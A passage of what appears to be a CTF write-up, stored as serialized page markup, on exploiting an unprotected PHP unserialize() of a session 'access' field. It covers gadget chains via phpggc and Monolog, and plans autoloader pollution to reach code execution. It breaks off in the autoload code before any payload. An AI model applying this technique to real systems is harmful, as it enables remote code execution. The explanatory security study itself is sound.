$data);\n}\n",[1268],{"type":32,"tag":63,"props":1269,"children":1270},{"__ignoreMap":7},[1271,1300,1307,1403],{"type":32,"tag":99,"props":1272,"children":1273},{"class":101,"line":102},[1274,1278,1282,1287,1291,1296],{"type":32,"tag":99,"props":1275,"children":1276},{"style":339},[1277],{"type":38,"value":527},{"type":32,"tag":99,"props":1279,"children":1280},{"style":339},[1281],{"type":38,"value":532},{"type":32,"tag":99,"props":1283,"children":1284},{"style":345},[1285],{"type":38,"value":1286}," updateUser",{"type":32,"tag":99,"props":1288,"children":1289},{"style":284},[1290],{"type":38,"value":542},{"type":32,"tag":99,"props":1292,"children":1293},{"style":545},[1294],{"type":38,"value":1295},"data",{"type":32,"tag":99,"props":1297,"children":1298},{"style":284},[1299],{"type":38,"value":553},{"type":32,"tag":99,"props":1301,"children":1302},{"class":101,"line":112},[1303],{"type":32,"tag":99,"props":1304,"children":1305},{"style":284},[1306],{"type":38,"value":361},{"type":32,"tag":99,"props":1308,"children":1309},{"class":101,"line":122},[1310,1315,1319,1323,1327,1331,1335,1340,1344,1348,1352,1356,1360,1364,1368,1373,1377,1382,1386,1391,1395,1399],{"type":32,"tag":99,"props":1311,"children":1312},{"style":126},[1313],{"type":38,"value":1314},"  return",{"type":32,"tag":99,"props":1316,"children":1317},{"style":284},[1318],{"type":38,"value":573},{"type":32,"tag":99,"props":1320,"children":1321},{"style":576},[1322],{"type":38,"value":579},{"type":32,"tag":99,"props":1324,"children":1325},{"style":339},[1326],{"type":38,"value":584},{"type":32,"tag":99,"props":1328,"children":1329},{"style":545},[1330],{"type":38,"value":589},{"type":32,"tag":99,"props":1332,"children":1333},{"style":339},[1334],{"type":38,"value":584},{"type":32,"tag":99,"props":1336,"children":1337},{"style":345},[1338],{"type":38,"value":1339},"update",{"type":32,"tag":99,"props":1341,"children":1342},{"style":284},[1343],{"type":38,"value":374},{"type":32,"tag":99,"props":1345,"children":1346},{"style":295},[1347],{"type":38,"value":606},{"type":32,"tag":99,"props":1349,"children":1350},{"style":301},[1351],{"type":38,"value":751},{"type":32,"tag":99,"props":1353,"children":1354},{"style":295},[1355],{"type":38,"value":606},{"type":32,"tag":99,"props":1357,"children":1358},{"style":284},[1359],{"type":38,"value":620},{"type":32,"tag":99,"props":1361,"children":1362},{"style":284},[1363],{"type":38,"value":573},{"type":32,"tag":99,"props":1365,"children":1366},{"style":545},[1367],{"type":38,"value":1295},{"type":32,"tag":99,"props":1369,"children":1370},{"style":284},[1371],{"type":38,"value":1372},"[",{"type":32,"tag":99,"props":1374,"children":1375},{"style":295},[1376],{"type":38,"value":606},{"type":32,"tag":99,"props":1378,"children":1379},{"style":301},[1380],{"type":38,"value":1381},"_id",{"type":32,"tag":99,"props":1383,"children":1384},{"style":295},[1385],{"type":38,"value":606},{"type":32,"tag":99,"props":1387,"children":1388},{"style":284},[1389],{"type":38,"value":1390},"],",{"type":32,"tag":99,"props":1392,"children":1393},{"style":284},[1394],{"type":38,"value":573},{"type":32,"tag":99,"props":1396,"children":1397},{"style":545},[1398],{"type":38,"value":1295},{"type":32,"tag":99,"props":1400,"children":1401},{"style":284},[1402],{"type":38,"value":385},{"type":32,"tag":99,"props":1404,"children":1405},{"class":101,"line":137},[1406],{"type":32,"tag":99,"props":1407,"children":1408},{"style":284},[1409],{"type":38,"value":423},{"type":32,"tag":47,"props":1411,"children":1412},{},[1413],{"type":38,"value":1414},"In this function we control the data parameter. Therefore, we can see that it is possible to update an entire user, including their access element.\nThis access element is a serialized array, so it is obvious that at some point in the application this element will be deserialized.",{"type":32,"tag":47,"props":1416,"children":1417},{},[1418],{"type":38,"value":1419},"A user in database have this structure:",{"type":32,"tag":85,"props":1421,"children":1422},{"lang":667},[1423],{"type":32,"tag":90,"props":1424,"children":1426},{"code":1425,"language":667,"meta":7,"className":672,"style":7},"{\n    \"_id\": 1,\n    \"username\": \"admin\",\n    \"password\": \"[REDACTED]\",\n    \"access\": \"a:4:{s:9:\\\"Dashboard\\\";b:1;s:7:\\\"Product\\\";b:1;s:5:\\\"Order\\\";b:1;s:4:\\\"User\\\";b:1;}\"\n}\n",[1427],{"type":32,"tag":63,"props":1428,"children":1429},{"__ignoreMap":7},[1430,1437,1466,1503,1540,1647],{"type":32,"tag":99,"props":1431,"children":1432},{"class":101,"line":102},[1433],{"type":32,"tag":99,"props":1434,"children":1435},{"style":284},[1436],{"type":38,"value":361},{"type":32,"tag":99,"props":1438,"children":1439},{"class":101,"line":112},[1440,1444,1448,1452,1456,1461],{"type":32,"tag":99,"props":1441,"children":1442},{"style":698},[1443],{"type":38,"value":701},{"type":32,"tag":99,"props":1445,"children":1446},{"style":704},[1447],{"type":38,"value":1381},{"type":32,"tag":99,"props":1449,"children":1450},{"style":698},[1451],{"type":38,"value":402},{"type":32,"tag":99,"props":1453,"children":1454},{"style":284},[1455],{"type":38,"value":715},{"type":32,"tag":99,"props":1457,"children":1458},{"style":377},[1459],{"type":38,"value":1460}," 1",{"type":32,"tag":99,"props":1462,"children":1463},{"style":284},[1464],{"type":38,"value":1465},",\n",{"type":32,"tag":99,"props":1467,"children":1468},{"class":101,"line":122},[1469,1473,1478,1482,1486,1490,1495,1499],{"type":32,"tag":99,"props":1470,"children":1471},{"style":698},[1472],{"type":38,"value":701},{"type":32,"tag":99,"props":1474,"children":1475},{"style":704},[1476],{"type":38,"value":1477},"username",{"type":32,"tag":99,"props":1479,"children":1480},{"style":698},[1481],{"type":38,"value":402},{"type":32,"tag":99,"props":1483,"children":1484},{"style":284},[1485],{"type":38,"value":715},{"type":32,"tag":99,"props":1487,"children":1488},{"style":295},[1489],{"type":38,"value":746},{"type":32,"tag":99,"props":1491,"children":1492},{"style":301},[1493],{"type":38,"value":1494},"admin",{"type":32,"tag":99,"props":1496,"children":1497},{"style":295},[1498],{"type":38,"value":402},{"type":32,"tag":99,"props":1500,"children":1501},{"style":284},[1502],{"type":38,"value":1465},{"type":32,"tag":99,"props":1504,"children":1505},{"class":101,"line":137},[1506,1510,1515,1519,1523,1527,1532,1536],{"type":32,"tag":99,"props":1507,"children":1508},{"style":698},[1509],{"type":38,"value":701},{"type":32,"tag":99,"props":1511,"children":1512},{"style":704},[1513],{"type":38,"value":1514},"password",{"type":32,"tag":99,"props":1516,"children":1517},{"style":698},[1518],{"type":38,"value":402},{"type":32,"tag":99,"props":1520,"children":1521},{"style":284},[1522],{"type":38,"value":715},{"type":32,"tag":99,"props":1524,"children":1525},{"style":295},[1526],{"type":38,"value":746},{"type":32,"tag":99,"props":1528,"children":1529},{"style":301},[1530],{"type":38,"value":1531},"[REDACTED]",{"type":32,"tag":99,"props":1533,"children":1534},{"style":295},[1535],{"type":38,"value":402},{"type":32,"tag":99,"props":1537,"children":1538},{"style":284},[1539],{"type":38,"value":1465},{"type":32,"tag":99,"props":1541,"children":1542},{"class":101,"line":147},[1543,1547,1552,1556,1560,1564,1569,1574,1579,1583,1588,1592,1597,1601,1606,1610,1615,1619,1624,1628,1633,1637,1642],{"type":32,"tag":99,"props":1544,"children":1545},{"style":698},[1546],{"type":38,"value":701},{"type":32,"tag":99,"props":1548,"children":1549},{"style":704},[1550],{"type":38,"value":1551},"access",{"type":32,"tag":99,"props":1553,"children":1554},{"style":698},[1555],{"type":38,"value":402},{"type":32,"tag":99,"props":1557,"children":1558},{"style":284},[1559],{"type":38,"value":715},{"type":32,"tag":99,"props":1561,"children":1562},{"style":295},[1563],{"type":38,"value":746},{"type":32,"tag":99,"props":1565,"children":1566},{"style":301},[1567],{"type":38,"value":1568},"a:4:{s:9:",{"type":32,"tag":99,"props":1570,"children":1571},{"style":576},[1572],{"type":38,"value":1573},"\\\"",{"type":32,"tag":99,"props":1575,"children":1576},{"style":301},[1577],{"type":38,"value":1578},"Dashboard",{"type":32,"tag":99,"props":1580,"children":1581},{"style":576},[1582],{"type":38,"value":1573},{"type":32,"tag":99,"props":1584,"children":1585},{"style":301},[1586],{"type":38,"value":1587},";b:1;s:7:",{"type":32,"tag":99,"props":1589,"children":1590},{"style":576},[1591],{"type":38,"value":1573},{"type":32,"tag":99,"props":1593,"children":1594},{"style":301},[1595],{"type":38,"value":1596},"Product",{"type":32,"tag":99,"props":1598,"children":1599},{"style":576},[1600],{"type":38,"value":1573},{"type":32,"tag":99,"props":1602,"children":1603},{"style":301},[1604],{"type":38,"value":1605},";b:1;s:5:",{"type":32,"tag":99,"props":1607,"children":1608},{"style":576},[1609],{"type":38,"value":1573},{"type":32,"tag":99,"props":1611,"children":1612},{"style":301},[1613],{"type":38,"value":1614},"Order",{"type":32,"tag":99,"props":1616,"children":1617},{"style":576},[1618],{"type":38,"value":1573},{"type":32,"tag":99,"props":1620,"children":1621},{"style":301},[1622],{"type":38,"value":1623},";b:1;s:4:",{"type":32,"tag":99,"props":1625,"children":1626},{"style":576},[1627],{"type":38,"value":1573},{"type":32,"tag":99,"props":1629,"children":1630},{"style":301},[1631],{"type":38,"value":1632},"User",{"type":32,"tag":99,"props":1634,"children":1635},{"style":576},[1636],{"type":38,"value":1573},{"type":32,"tag":99,"props":1638,"children":1639},{"style":301},[1640],{"type":38,"value":1641},";b:1;}",{"type":32,"tag":99,"props":1643,"children":1644},{"style":295},[1645],{"type":38,"value":1646},"\"\n",{"type":32,"tag":99,"props":1648,"children":1649},{"class":101,"line":156},[1650],{"type":32,"tag":99,"props":1651,"children":1652},{"style":284},[1653],{"type":38,"value":423},{"type":32,"tag":47,"props":1655,"children":1656},{},[1657],{"type":38,"value":1658},"The access element is used to determine the user's access rights, on the back office.",{"type":32,"tag":47,"props":1660,"children":1661},{},[1662],{"type":38,"value":1663},"We can see that deserialization is not protected and is therefore susceptible to be exploited.",{"type":32,"tag":85,"props":1665,"children":1666},{"lang":510},[1667],{"type":32,"tag":90,"props":1668,"children":1670},{"code":1669,"language":510,"meta":7,"className":515,"style":7},"\u003C?php\nclass UserModel extends Model\n{\n  public function __construct()\n  {\n    parent::__construct();\n    $this->username = $_SESSION['username'] ?? '';\n    $this->email    = $_SESSION['email'] ?? '';\n    $this->access   = unserialize($_SESSION['access'] ?? ''); // This line is vulnerable\n  }\n  ...\n",[1671],{"type":32,"tag":63,"props":1672,"children":1673},{"__ignoreMap":7},[1674,1687,1711,1718,1739,1746,1764,1833,1898,1973,1980],{"type":32,"tag":99,"props":1675,"children":1676},{"class":101,"line":102},[1677,1682],{"type":32,"tag":99,"props":1678,"children":1679},{"style":339},[1680],{"type":38,"value":1681},"\u003C?",{"type":32,"tag":99,"props":1683,"children":1684},{"style":576},[1685],{"type":38,"value":1686},"php\n",{"type":32,"tag":99,"props":1688,"children":1689},{"class":101,"line":112},[1690,1695,1701,1706],{"type":32,"tag":99,"props":1691,"children":1692},{"style":339},[1693],{"type":38,"value":1694},"class",{"type":32,"tag":99,"props":1696,"children":1698},{"style":1697},"--shiki-default:#5DA994",[1699],{"type":38,"value":1700}," UserModel",{"type":32,"tag":99,"props":1702,"children":1703},{"style":339},[1704],{"type":38,"value":1705}," extends",{"type":32,"tag":99,"props":1707,"children":1708},{"style":345},[1709],{"type":38,"value":1710}," Model\n",{"type":32,"tag":99,"props":1712,"children":1713},{"class":101,"line":122},[1714],{"type":32,"tag":99,"props":1715,"children":1716},{"style":284},[1717],{"type":38,"value":361},{"type":32,"tag":99,"props":1719,"children":1720},{"class":101,"line":137},[1721,1726,1730,1735],{"type":32,"tag":99,"props":1722,"children":1723},{"style":339},[1724],{"type":38,"value":1725},"  public",{"type":32,"tag":99,"props":1727,"children":1728},{"style":339},[1729],{"type":38,"value":532},{"type":32,"tag":99,"props":1731,"children":1732},{"style":704},[1733],{"type":38,"value":1734}," __construct",{"type":32,"tag":99,"props":1736,"children":1737},{"style":284},[1738],{"type":38,"value":353},{"type":32,"tag":99,"props":1740,"children":1741},{"class":101,"line":147},[1742],{"type":32,"tag":99,"props":1743,"children":1744},{"style":284},[1745],{"type":38,"value":692},{"type":32,"tag":99,"props":1747,"children":1748},{"class":101,"line":156},[1749,1754,1759],{"type":32,"tag":99,"props":1750,"children":1751},{"style":339},[1752],{"type":38,"value":1753},"    parent::",{"type":32,"tag":99,"props":1755,"children":1756},{"style":345},[1757],{"type":38,"value":1758},"__construct",{"type":32,"tag":99,"props":1760,"children":1761},{"style":284},[1762],{"type":38,"value":1763},"();\n",{"type":32,"tag":99,"props":1765,"children":1766},{"class":101,"line":170},[1767,1772,1776,1780,1784,1788,1792,1797,1801,1805,1809,1813,1818,1823,1828],{"type":32,"tag":99,"props":1768,"children":1769},{"style":284},[1770],{"type":38,"value":1771},"    $",{"type":32,"tag":99,"props":1773,"children":1774},{"style":576},[1775],{"type":38,"value":579},{"type":32,"tag":99,"props":1777,"children":1778},{"style":339},[1779],{"type":38,"value":584},{"type":32,"tag":99,"props":1781,"children":1782},{"style":545},[1783],{"type":38,"value":1477},{"type":32,"tag":99,"props":1785,"children":1786},{"style":284},[1787],{"type":38,"value":1228},{"type":32,"tag":99,"props":1789,"children":1790},{"style":284},[1791],{"type":38,"value":573},{"type":32,"tag":99,"props":1793,"children":1794},{"style":545},[1795],{"type":38,"value":1796},"_SESSION",{"type":32,"tag":99,"props":1798,"children":1799},{"style":284},[1800],{"type":38,"value":1372},{"type":32,"tag":99,"props":1802,"children":1803},{"style":295},[1804],{"type":38,"value":606},{"type":32,"tag":99,"props":1806,"children":1807},{"style":301},[1808],{"type":38,"value":1477},{"type":32,"tag":99,"props":1810,"children":1811},{"style":295},[1812],{"type":38,"value":606},{"type":32,"tag":99,"props":1814,"children":1815},{"style":284},[1816],{"type":38,"value":1817},"]",{"type":32,"tag":99,"props":1819,"children":1820},{"style":339},[1821],{"type":38,"value":1822}," ??",{"type":32,"tag":99,"props":1824,"children":1825},{"style":295},[1826],{"type":38,"value":1827}," ''",{"type":32,"tag":99,"props":1829,"children":1830},{"style":284},[1831],{"type":38,"value":1832},";\n",{"type":32,"tag":99,"props":1834,"children":1835},{"class":101,"line":183},[1836,1840,1844,1848,1853,1858,1862,1866,1870,1874,1878,1882,1886,1890,1894],{"type":32,"tag":99,"props":1837,"children":1838},{"style":284},[1839],{"type":38,"value":1771},{"type":32,"tag":99,"props":1841,"children":1842},{"style":576},[1843],{"type":38,"value":579},{"type":32,"tag":99,"props":1845,"children":1846},{"style":339},[1847],{"type":38,"value":584},{"type":32,"tag":99,"props":1849,"children":1850},{"style":545},[1851],{"type":38,"value":1852},"email",{"type":32,"tag":99,"props":1854,"children":1855},{"style":284},[1856],{"type":38,"value":1857},"    =",{"type":32,"tag":99,"props":1859,"children":1860},{"style":284},[1861],{"type":38,"value":573},{"type":32,"tag":99,"props":1863,"children":1864},{"style":545},[1865],{"type":38,"value":1796},{"type":32,"tag":99,"props":1867,"children":1868},{"style":284},[1869],{"type":38,"value":1372},{"type":32,"tag":99,"props":1871,"children":1872},{"style":295},[1873],{"type":38,"value":606},{"type":32,"tag":99,"props":1875,"children":1876},{"style":301},[1877],{"type":38,"value":1852},{"type":32,"tag":99,"props":1879,"children":1880},{"style":295},[1881],{"type":38,"value":606},{"type":32,"tag":99,"props":1883,"children":1884},{"style":284},[1885],{"type":38,"value":1817},{"type":32,"tag":99,"props":1887,"children":1888},{"style":339},[1889],{"type":38,"value":1822},{"type":32,"tag":99,"props":1891,"children":1892},{"style":295},[1893],{"type":38,"value":1827},{"type":32,"tag":99,"props":1895,"children":1896},{"style":284},[1897],{"type":38,"value":1832},{"type":32,"tag":99,"props":1899,"children":1900},{"class":101,"line":196},[1901,1905,1909,1913,1917,1922,1927,1931,1935,1939,1943,1947,1951,1955,1959,1963,1968],{"type":32,"tag":99,"props":1902,"children":1903},{"style":284},[1904],{"type":38,"value":1771},{"type":32,"tag":99,"props":1906,"children":1907},{"style":576},[1908],{"type":38,"value":579},{"type":32,"tag":99,"props":1910,"children":1911},{"style":339},[1912],{"type":38,"value":584},{"type":32,"tag":99,"props":1914,"children":1915},{"style":545},[1916],{"type":38,"value":1551},{"type":32,"tag":99,"props":1918,"children":1919},{"style":284},[1920],{"type":38,"value":1921},"   =",{"type":32,"tag":99,"props":1923,"children":1924},{"style":704},[1925],{"type":38,"value":1926}," unserialize",{"type":32,"tag":99,"props":1928,"children":1929},{"style":284},[1930],{"type":38,"value":542},{"type":32,"tag":99,"props":1932,"children":1933},{"style":545},[1934],{"type":38,"value":1796},{"type":32,"tag":99,"props":1936,"children":1937},{"style":284},[1938],{"type":38,"value":1372},{"type":32,"tag":99,"props":1940,"children":1941},{"style":295},[1942],{"type":38,"value":606},{"type":32,"tag":99,"props":1944,"children":1945},{"style":301},[1946],{"type":38,"value":1551},{"type":32,"tag":99,"props":1948,"children":1949},{"style":295},[1950],{"type":38,"value":606},{"type":32,"tag":99,"props":1952,"children":1953},{"style":284},[1954],{"type":38,"value":1817},{"type":32,"tag":99,"props":1956,"children":1957},{"style":339},[1958],{"type":38,"value":1822},{"type":32,"tag":99,"props":1960,"children":1961},{"style":295},[1962],{"type":38,"value":1827},{"type":32,"tag":99,"props":1964,"children":1965},{"style":284},[1966],{"type":38,"value":1967},");",{"type":32,"tag":99,"props":1969,"children":1970},{"style":116},[1971],{"type":38,"value":1972}," // This line is vulnerable\n",{"type":32,"tag":99,"props":1974,"children":1975},{"class":101,"line":204},[1976],{"type":32,"tag":99,"props":1977,"children":1978},{"style":284},[1979],{"type":38,"value":1100},{"type":32,"tag":99,"props":1981,"children":1982},{"class":101,"line":213},[1983],{"type":32,"tag":99,"props":1984,"children":1985},{"style":284},[1986],{"type":38,"value":1987},"  ...\n",{"type":32,"tag":47,"props":1989,"children":1990},{},[1991],{"type":32,"tag":1992,"props":1993,"children":1994},"strong",{},[1995],{"type":38,"value":1996},"What is serialization?",{"type":32,"tag":47,"props":1998,"children":1999},{},[2000],{"type":38,"value":2001},"In PHP, serialization is the process of converting a PHP object or data structure into a format that can be easily stored or transmitted. The serialized data can be stored in a file, database, or sent over a network. The serialized data can then be later retrieved and unserialized, which is the process of converting the serialized data back into its original PHP object or data structure.",{"type":32,"tag":47,"props":2003,"children":2004},{},[2005],{"type":38,"value":2006},"Example:",{"type":32,"tag":85,"props":2008,"children":2009},{"lang":510},[2010],{"type":32,"tag":90,"props":2011,"children":2013},{"code":2012,"language":510,"meta":7,"className":515,"style":7},"$data = array('name' => 'John',\n              'age' => 30,\n              'email' => 'john@example.com');\n$serialized_data = serialize($data);\n\necho $serialized_data;\n'a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}'\n",[2014],{"type":32,"tag":63,"props":2015,"children":2016},{"__ignoreMap":7},[2017,2078,2108,2144,2177,2184,2204],{"type":32,"tag":99,"props":2018,"children":2019},{"class":101,"line":102},[2020,2025,2029,2033,2038,2042,2046,2051,2055,2060,2065,2070,2074],{"type":32,"tag":99,"props":2021,"children":2022},{"style":284},[2023],{"type":38,"value":2024},"$",{"type":32,"tag":99,"props":2026,"children":2027},{"style":545},[2028],{"type":38,"value":1295},{"type":32,"tag":99,"props":2030,"children":2031},{"style":284},[2032],{"type":38,"value":1228},{"type":32,"tag":99,"props":2034,"children":2035},{"style":704},[2036],{"type":38,"value":2037}," array",{"type":32,"tag":99,"props":2039,"children":2040},{"style":284},[2041],{"type":38,"value":374},{"type":32,"tag":99,"props":2043,"children":2044},{"style":295},[2045],{"type":38,"value":606},{"type":32,"tag":99,"props":2047,"children":2048},{"style":301},[2049],{"type":38,"value":2050},"name",{"type":32,"tag":99,"props":2052,"children":2053},{"style":295},[2054],{"type":38,"value":606},{"type":32,"tag":99,"props":2056,"children":2057},{"style":339},[2058],{"type":38,"value":2059}," =>",{"type":32,"tag":99,"props":2061,"children":2062},{"style":295},[2063],{"type":38,"value":2064}," '",{"type":32,"tag":99,"props":2066,"children":2067},{"style":301},[2068],{"type":38,"value":2069},"John",{"type":32,"tag":99,"props":2071,"children":2072},{"style":295},[2073],{"type":38,"value":606},{"type":32,"tag":99,"props":2075,"children":2076},{"style":284},[2077],{"type":38,"value":1465},{"type":32,"tag":99,"props":2079,"children":2080},{"class":101,"line":112},[2081,2086,2091,2095,2099,2104],{"type":32,"tag":99,"props":2082,"children":2083},{"style":295},[2084],{"type":38,"value":2085},"              '",{"type":32,"tag":99,"props":2087,"children":2088},{"style":301},[2089],{"type":38,"value":2090},"age",{"type":32,"tag":99,"props":2092,"children":2093},{"style":295},[2094],{"type":38,"value":606},{"type":32,"tag":99,"props":2096,"children":2097},{"style":339},[2098],{"type":38,"value":2059},{"type":32,"tag":99,"props":2100,"children":2101},{"style":377},[2102],{"type":38,"value":2103}," 30",{"type":32,"tag":99,"props":2105,"children":2106},{"style":284},[2107],{"type":38,"value":1465},{"type":32,"tag":99,"props":2109,"children":2110},{"class":101,"line":122},[2111,2115,2119,2123,2127,2131,2136,2140],{"type":32,"tag":99,"props":2112,"children":2113},{"style":295},[2114],{"type":38,"value":2085},{"type":32,"tag":99,"props":2116,"children":2117},{"style":301},[2118],{"type":38,"value":1852},{"type":32,"tag":99,"props":2120,"children":2121},{"style":295},[2122],{"type":38,"value":606},{"type":32,"tag":99,"props":2124,"children":2125},{"style":339},[2126],{"type":38,"value":2059},{"type":32,"tag":99,"props":2128,"children":2129},{"style":295},[2130],{"type":38,"value":2064},{"type":32,"tag":99,"props":2132,"children":2133},{"style":301},[2134],{"type":38,"value":2135},"john@example.com",{"type":32,"tag":99,"props":2137,"children":2138},{"style":295},[2139],{"type":38,"value":606},{"type":32,"tag":99,"props":2141,"children":2142},{"style":284},[2143],{"type":38,"value":385},{"type":32,"tag":99,"props":2145,"children":2146},{"class":101,"line":137},[2147,2151,2156,2160,2165,2169,2173],{"type":32,"tag":99,"props":2148,"children":2149},{"style":284},[2150],{"type":38,"value":2024},{"type":32,"tag":99,"props":2152,"children":2153},{"style":545},[2154],{"type":38,"value":2155},"serialized_data",{"type":32,"tag":99,"props":2157,"children":2158},{"style":284},[2159],{"type":38,"value":1228},{"type":32,"tag":99,"props":2161,"children":2162},{"style":704},[2163],{"type":38,"value":2164}," serialize",{"type":32,"tag":99,"props":2166,"children":2167},{"style":284},[2168],{"type":38,"value":542},{"type":32,"tag":99,"props":2170,"children":2171},{"style":545},[2172],{"type":38,"value":1295},{"type":32,"tag":99,"props":2174,"children":2175},{"style":284},[2176],{"type":38,"value":385},{"type":32,"tag":99,"props":2178,"children":2179},{"class":101,"line":147},[2180],{"type":32,"tag":99,"props":2181,"children":2182},{"emptyLinePlaceholder":141},[2183],{"type":38,"value":144},{"type":32,"tag":99,"props":2185,"children":2186},{"class":101,"line":156},[2187,2192,2196,2200],{"type":32,"tag":99,"props":2188,"children":2189},{"style":704},[2190],{"type":38,"value":2191},"echo",{"type":32,"tag":99,"props":2193,"children":2194},{"style":284},[2195],{"type":38,"value":573},{"type":32,"tag":99,"props":2197,"children":2198},{"style":545},[2199],{"type":38,"value":2155},{"type":32,"tag":99,"props":2201,"children":2202},{"style":284},[2203],{"type":38,"value":1832},{"type":32,"tag":99,"props":2205,"children":2206},{"class":101,"line":170},[2207,2211,2216],{"type":32,"tag":99,"props":2208,"children":2209},{"style":295},[2210],{"type":38,"value":606},{"type":32,"tag":99,"props":2212,"children":2213},{"style":301},[2214],{"type":38,"value":2215},"a:3:{s:4:\"name\";s:4:\"John\";s:3:\"age\";i:30;s:5:\"email\";s:17:\"john@example.com\";}",{"type":32,"tag":99,"props":2217,"children":2218},{"style":295},[2219],{"type":38,"value":2220},"'\n",{"type":32,"tag":47,"props":2222,"children":2223},{},[2224,2226],{"type":38,"value":2225},"If malicious users can manipulate the serialized data, it can be used to inject malicious code into the unserialized data. This is known as a deserialization vulnerability and can be a serious security issue. The most famous repo to generate payloads for deserialization vulnerabilities is ",{"type":32,"tag":651,"props":2227,"children":2230},{"href":2228,"rel":2229},"https://github.com/ambionics/phpggc",[655],[2231],{"type":38,"value":2232},"phpggc (php generic gadget chains)",{"type":32,"tag":40,"props":2234,"children":2236},{"id":2235},"php-gadgets",[2237],{"type":38,"value":2238},"PHP Gadgets",{"type":32,"tag":47,"props":2240,"children":2241},{},[2242,2244,2250],{"type":38,"value":2243},"So we can then use the ",{"type":32,"tag":651,"props":2245,"children":2247},{"href":2228,"rel":2246},[655],[2248],{"type":38,"value":2249},"phpggc",{"type":38,"value":2251}," library which allows crafting payloads exploiting the deserialization vulnerability.\nphpggc is based on the exploitation of deserialization through known libraries such as Monolog, Guzzle, Symfony, Laravel, etc.",{"type":32,"tag":47,"props":2253,"children":2254},{},[2255,2257,2262],{"type":38,"value":2256},"However, we quickly realize that the interesting libraries (in our case ",{"type":32,"tag":1992,"props":2258,"children":2259},{},[2260],{"type":38,"value":2261},"Monolog",{"type":38,"value":2263},") are located in the frontend part, while our unserialization is performed in the backend part.\nTherefore, it is currently impossible for us to load the frontend libraries.",{"type":32,"tag":40,"props":2265,"children":2267},{"id":2266},"autoload",[2268],{"type":38,"value":2269},"Autoload",{"type":32,"tag":47,"props":2271,"children":2272},{},[2273,2275,2282],{"type":38,"value":2274},"For this part we based our work on ",{"type":32,"tag":651,"props":2276,"children":2279},{"href":2277,"rel":2278},"https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable",[655],[2280],{"type":38,"value":2281},"this article",{"type":38,"value":2283},".",{"type":32,"tag":47,"props":2285,"children":2286},{},[2287],{"type":38,"value":2288},"With this deserialization, we can pollute the backend's autoloader to include the frontend's autoloader which will result in loading the required library to perform a RCE.",{"type":32,"tag":47,"props":2290,"children":2291},{},[2292],{"type":38,"value":2293},"Here is the reaction of my team when I said that on discord 😂",{"type":32,"tag":466,"props":2295,"children":2297},{"width":468,"src":2296},"https://user-images.githubusercontent.com/28403617/227541758-87dcc953-7467-445c-9ed0-1d6bc81ff7e4.png",[],{"type":32,"tag":47,"props":2299,"children":2300},{},[2301],{"type":32,"tag":1992,"props":2302,"children":2303},{},[2304],{"type":38,"value":2305},"What is the autoload function ?",{"type":32,"tag":47,"props":2307,"children":2308},{},[2309],{"type":38,"value":2310},"In PHP, \"Autoload\" refers to the automatic loading of PHP classes as needed, without having to manually include the class files. Once the Autoloader function has located the file, it includes it, and the class becomes available for use in the current script. The Autoload mechanism helps to reduce the amount of code you need to write, by automatically loading classes as needed, so you don't have to include them manually in every script. It also simplifies the task of managing dependencies between classes, by allowing you to organize your code into logical namespaces and directories.",{"type":32,"tag":47,"props":2312,"children":2313},{},[2314],{"type":38,"value":2315},"The idea is clear, for that we need to analyze the function passed as a parameter to the spl_autoload_register located in index.php file from backend folder.",{"type":32,"tag":47,"props":2317,"children":2318},{},[2319],{"type":38,"value":2320},"This function is a built-in function in PHP that allows you to register multiple functions (or methods) to be called when a class is not yet defined. So it's used for including local classes (not for classes from vendor folder).",{"type":32,"tag":85,"props":2322,"children":2323},{"land":510},[2324],{"type":32,"tag":90,"props":2325,"children":2327},{"code":2326,"language":510,"meta":7,"className":515,"style":7},"spl_autoload_register(function ($name) {\n    if (preg_match('/Controller$/', $name)) {\n        $name = \"controllers/${name}\";\n    } elseif (preg_match('/Model$/', $name)) {\n        $name = \"models/${name}\";\n    } elseif (preg_match('/_/', $name)) {\n        $name = preg_replace('/_/', '/', $name);\n    }\n\n    $filename = \"/${name}.php\";\n\n    if (file_exists($filename)) {\n        require $filename;\n    }\n    elseif (file_exists(__DIR__ . $filename)) {\n        require __DIR__ . $filename;\n    }\n});\n",[2328],{"type":32,"tag":63,"props":2329,"children":2330},{"__ignoreMap":7},[2331,2366,2429,2476,2538,2582,2638,2707,2714,2721,2770,2777,2809,2829,2836,2882,2911,2919],{"type":32,"tag":99,"props":2332,"children":2333},{"class":101,"line":102},[2334,2339,2343,2348,2353,2357,2362],{"type":32,"tag":99,"props":2335,"children":2336},{"style":704},[2337],{"type":38,"value":2338},"spl_autoload_register",{"type":32,"tag":99,"props":2340,"children":2341},{"style":284},[2342],{"type":38,"value":374},{"type":32,"tag":99,"props":2344,"children":2345},{"style":339},[2346],{"type":38,"value":2347},"function",{"type":32,"tag":99,"props":2349,"children":2350},{"style":284},[2351],{"type":38,"value":2352}," ($",{"type":32,"tag":99,"props":2354,"children":2355},{"style":545},[2356],{"type":38,"value":2050},{"type":32,"tag":99,"props":2358,"children":2359},{"style":284},[2360],{"type":38,"value":2361},")",{"type":32,"tag":99,"props":2363,"children":2364},{"style":284},[2365],{"type":38,"value":720},{"type":32,"tag":99,"props":2367,"children":2368},{"class":101,"line":112},[2369,2374,2379,2384,2388,2393,2399,2403,2408,2412,2416,2420,2425],{"type":32,"tag":99,"props":2370,"children":2371},{"style":126},[2372],{"type":38,"value":2373},"    if",{"type":32,"tag":99,"props":2375,"children":2376},{"style":284},[2377],{"type":38,"value":2378}," (",{"type":32,"tag":99,"props":2380,"children":2381},{"style":704},[2382],{"type":38,"value":2383},"preg_match",{"type":32,"tag":99,"props":2385,"children":2386},{"style":284},[2387],{"type":38,"value":374},{"type":32,"tag":99,"props":2389,"children":2390},{"style":295},[2391],{"type":38,"value":2392},"'/",{"type":32,"tag":99,"props":2394,"children":2396},{"style":2395},"--shiki-default:#C4704F",[2397],{"type":38,"value":2398},"Controller",{"type":32,"tag":99,"props":2400,"children":2401},{"style":339},[2402],{"type":38,"value":2024},{"type":32,"tag":99,"props":2404,"children":2405},{"style":295},[2406],{"type":38,"value":2407},"/'",{"type":32,"tag":99,"props":2409,"children":2410},{"style":284},[2411],{"type":38,"value":620},{"type":32,"tag":99,"props":2413,"children":2414},{"style":284},[2415],{"type":38,"value":573},{"type":32,"tag":99,"props":2417,"children":2418},{"style":545},[2419],{"type":38,"value":2050},{"type":32,"tag":99,"props":2421,"children":2422},{"style":284},[2423],{"type":38,"value":2424},"))",{"type":32,"tag":99,"props":2426,"children":2427},{"style":284},[2428],{"type":38,"value":720},{"type":